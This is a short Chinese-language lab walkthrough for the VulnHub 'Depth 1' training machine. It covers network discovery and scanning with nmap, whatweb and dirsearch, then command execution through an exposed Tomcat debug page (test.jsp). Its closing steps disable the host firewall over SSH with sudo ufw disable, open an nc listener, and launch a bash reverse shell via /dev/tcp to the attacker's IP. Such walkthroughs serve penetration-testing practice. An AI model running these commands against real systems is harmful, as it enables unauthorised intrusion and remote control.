一、靶机下载地址
https://www.vulnhub.com/entry/depth-1,213/
二、信息收集
1、主机发现
# 使用命令
nmap 192.168.145.0/24 -sn | grep -B 2 '00:0C:29:B9:A6:BD'
2、端口扫描
# 使用命令
nmap 192.168.145.186 -p- -sV
3、指纹识别
# 使用命令
whatweb 192.168.145.186:8080
4、目录扫描
# 使用命令
dirsearch -u "http://192.168.145.186:8080"
三、获取shell
1、访问靶机IP地址
2、 点击 manager webapp
会跳转一个登录框
3、 访问test.jsp文件,是一个debug页面
4、 输入ls -la /home,发现root 和bill用户
5、 可以执行命令,但是尝试反弹shell失败,查看进程,发现有ssh,之前没有扫到,可能是因为防火墙
# 使用命令
ps aux
6、 查看/etc,防火墙是开启状态
# 使用命令
ls -al /etc
7、 尝试关闭防火墙
# 使用命令
ssh bill@192.168.145.185 sudo ufw disable
8、 尝试反弹shell,kali开启监听
# 使用命令
nc -lvnp 1234
9、执行反弹shell的命令,成功获取到shell
# 使用命令
ssh bill@localhost bash -i >& /dev/tcp/192.168.145.146/1234 0>&1